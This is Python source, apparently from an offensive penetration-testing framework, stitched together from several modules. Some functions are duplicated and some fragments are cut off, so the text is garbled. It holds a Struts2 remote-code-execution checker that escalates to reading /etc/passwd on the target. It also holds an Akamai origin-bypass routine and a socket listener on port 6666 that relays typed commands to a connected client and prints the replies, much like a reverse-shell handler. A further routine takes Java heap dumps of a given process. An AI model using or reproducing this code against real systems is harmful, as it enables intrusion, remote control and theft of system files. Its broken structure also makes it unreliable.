def do_get(self):
self.send_response(200)
from framework.utils.logger import logger
logger(
"info", "Download Detected! :: {0} {1} {2} {3}".format(
self.command, self.path, self.protocol_version, 200))
self.end_headers()
def handle(self):
try:
if self.request.recv(1024).strip().decode("utf-8") == "ready":
while True:
command = input(t.green(">>> "))
self.request.sendall(bytes(command, "utf-8"))
print(self.request.recv(2048).decode())
if command == 'quit':
self.server._shutdown_request = True
except Exception as error:
# This is broad until I know what to catch
logger("warning", "Error!")
raise error
def do_bypass(self, ip):
""" Bypass Akamai
"""
# Set some shit up first
port = AuxiliaryEnums.HTTP_PORT
address = (ip, port.value)
url = self.target
request = "GET / HTTP/1.1\r\nHost: {0}\r\n\r\n".format(url)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
s.send(request.encode())
data = s.recv(15)
if "200" in data.decode('utf-8'):
logger("info", "Origin Access Possible!")
else:
logger("warning", "Origin Access Not Possible! :: {0}".format(t.yellow(data.decode("utf-8"))))
# Don't forget to close the socket
s.close()
except socket.error as e:
# Handle some exceptions
if e.errno != errno.ECONNREFUSED:
logger("warning", "Connection Issue!")
raise e
else:
logger("warning", "Socket Refused!")
pass
def run(self):
"""
Run HTTP server
"""
httpd = socketserver.TCPServer((self.address, self.port), HTTPHandler)
logger("info", "HTTP server started")
try:
httpd.handle_request()
except Exception as e:
logger("warning", "Problem starting HTTP server")
raise e
def do_akaspy(args):
"""
Usage: akaspy origin target
"""
try:
import framework.aux.akaspy as akaspy
except ImportError as e:
logger("warning", "Failure To Import Module!\n >>> {0}".format(e))
sys.exit(1)
else:
origin, target = args.split()[0], args.split()[1]
run = akaspy.AkaspyAction(origin, target)
run.check_origin()
def do_jmap(args):
"""
Usage: jmap {Number of Heap Dumps} {ProcessID}
"""
try:
from framework.aux.jmap import JmapAction as jmap
except ImportError as e:
logger("warning", "Failure To Import Module!\n >>> {0}".format(e))
sys.exit(1)
else:
number, pid = args.split()
run = jmap(int(number), pid)
run.heap_dump()
def do_struts2(args):
"""
Usage: struts2 params
"""
try:
import framework.modules.struts2.struts2_includeParams as struts2_params
except ImportError as e:
logger("warning", "Failure To Import Module!\n >>> {0}".format(e))
sys.exit(1)
else:
if args.split()[1] == "params":
run = struts2_params.Struts2IncludeParamsAction(
args.split()[0])
run.check_exec()
def xml_formatter(file):
"""
Correctly format any XML file for parsing operations
"""
try:
from lxml import etree
parser = etree.XMLParser(remove_blank_text=True, encoding="UTF-8", recover=True)
document = etree.fromstring(file.read().encode("UTF-8"), parser=parser)
# Returns xml document as a string
return etree.tostring(document).decode("UTF-8")
except ImportError:
logger("warning", "Cannot import lmxl!")
except etree.ParseError:
logger("warning", "Cannot parse XML!")
def do_jnlp(args):
"""
Usage: jnlp /path/to/application.jnlp
"""
try:
import framework.aux.jnlp_parser as jnlp
except ImportError as e:
logger("warning", "Failure To Import Module!\n >>> {0}".format(e))
sys.exit(1)
else:
try:
with open(args.split()[0], "r+") as jnlp_file:
run = jnlp.JNLPAction(f.xml_formatter(jnlp_file))
run.jnlp_parse()
run.jnlp_download_jars()
jnlp_file.close()
except FileNotFoundError:
logger("warning", "Cannot open file!")
def heap_dump(self):
"""
Perform heap dump on target PID
"""
try:
for n in range(self.num):
p = subprocess.Popen(
"jmap -dump:format=b,file=heap{0}.bin {1}".format(
str(n), self.pid),
shell=True)
p.wait()
except subprocess.CalledProcessError:
logger("warning", "Process error!")
logger("warning", "Make sure jmap is in your path")
except ValueError:
logger("warning", "Argument error!")
self.request.sendall(bytes(command, "utf-8"))
print(self.request.recv(2048).decode())
if command == 'quit':
self.server._shutdown_request = True
except Exception as error:
# This is broad until I know what to catch
logger("warning", "Error!")
raise error
if __name__ == "__main__":
# Setup IP, and PORT
IP, PORT = socket.gethostbyname(socket.gethostname()), 6666
try:
server = socketserver.TCPServer((IP, PORT), Handler)
server.serve_forever()
except socket.error:
logger("warning", "Could not create socket!")
except OSError as e:
logger("warning", "Cannot start handler!")
raise e
except KeyboardInterrupt:
sys.exit(0)
def check_exec(self):
"""
Check Execution
"""
payload, param = parse.quote_plus(
Struts2Enum.check.value), Struts2Enum.param.value
target = ''.join("{0}{1}{2}".format(self.url, param, payload))
try:
logger("info", "Checking target :: {0}".format(t.yellow(self.url)))
r = requests.get(target)
if r.status_code != 200:
logger("warning", "Unexpected status code!")
else:
if r.text:
html = Soup(r.text)
response = html.find('slither').contents[0]
if response == "pwn":
logger(
"info",
"Code execution is possible! :: {0}".format(
t.yellow(response)))
self.fatality_exec()
else:
logger("warning", "Code is not possible!")
else:
logger("warning", "No HTTP response!")
except requests.HTTPError:
logger("warning", "HTTP error!")
sys.exit(1)
except requests.ConnectionError:
logger("warning", "Connection error!")
sys.exit(1)
def fatality_exec(self):
"""
Fatality Execution ('cat /etc/passwd')
"""
try:
logger(
"info", "Attempting execution :: {0}".format(
t.yellow(Struts2Enum.fatality.value)))
r = requests.get(''.join("{0}{1}{2}".format(
self.url, Struts2Enum.param.value,
parse.quote_plus(Struts2Enum.fatality.value))))
if r.status_code == 200:
logger("info", "Execution success!")
logger("info", ''.join(t.yellow(r.text)))
else:
logger("warning", "Unexpected status code!")
except requests.HTTPError:
logger("warning", "HTTP error!")
sys.exit(1)
except requests.ConnectionError:
logger("warning", "HTTP error!")
sys.exit(1)
def check_exec(self):
""" Check Execution
"""
payload, param = parse.quote_plus(Struts2Enum.check.value), Struts2Enum.param.value
target = ''.join("{0}{1}{2}".format(self.url, param, payload))
try:
logger("info", "Checking Target :: {0}".format(t.yellow(self.url)))
r = requests.get(target)
if r.status_code != 200:
logger("warning", "Unexpected Status Code!")
else:
if r.text:
html = Soup(r.text)
response = html.find('slither').contents[0]
if response == "pwn":
logger("info", "Code Execution Possible! :: {0}".format(t.yellow(response)))
self.fatality_exec()
else:
logger("warning", "Code Execution Not Possible!")
else:
logger("warning", "No HTTP Response!")
except requests.HTTPError:
logger("warning", "HTTP Error")
sys.exit(1)
except requests.ConnectionError:
logger("warning", "Connection Error!")
sys.exit(1)
class HTTPServer(object):
def __init__(self, address, port):
self.address = address
self.port = int(port)
def run(self):
"""
Run HTTP server
"""
httpd = socketserver.TCPServer((self.address, self.port), HTTPHandler)
logger("info", "HTTP server started")
try:
httpd.handle_request()
except Exception as e:
logger("warning", "Problem starting HTTP server")
raise e
if __name__ == '__main__':
try:
server = HTTPServer("0.0.0.0", 8000)
server.run()
except KeyboardInterrupt:
logger("warning", "Exiting HTTP server!")
sys.exit(0)
def check_origin(self):
""" Check the origin
"""
try:
# Set some shit up first
answer = dns.resolver.query(self.domain)
if answer.qname == answer.canonical_name:
logger("warning", "Incorrect DNS Record :: {0}".format(t.yellow(str(answer.qname))))
logger("info", "Origin Not Accessible!")
else:
logger("info", "Retrieved An Alias! :: {0}".format(t.yellow(str(answer.canonical_name))))
response = dns.resolver.query(answer.canonical_name, 'A')
for response_data in response:
ip = response_data.address
if ip:
logger("info", "Getting IP Address :: {0}".format(t.yellow(ip)))
self.do_bypass(ip)
except dns.resolver.NXDOMAIN:
logger("warning", "Domain Not Found!")
pass
except dns.resolver.Timeout:
logger("warning", "Query Timed Out!")
pass
except dns.exception.DNSException:
logger("warning", "DNS Exception!")
pass
def fatality_exec(self):
""" Fatality Execution ('cat /etc/passwd')
"""
try:
logger("info", "Attempting Execution :: {0}".format(t.yellow(Struts2Enum.fatality.value)))
r = requests.get(''.join("{0}{1}{2}".format(self.url, Struts2Enum.param.value,
parse.quote_plus(Struts2Enum.fatality.value))))
if r.status_code == 200:
logger("info", "Execution Success!")
logger("info", ''.join(t.yellow(r.text)))
else:
logger("warning", "Unexpected Status Code!")
except requests.HTTPError:
logger("warning", "HTTP Error")
sys.exit(1)
except requests.ConnectionError:
logger("warning", "HTTP Error")
sys.exit(1)
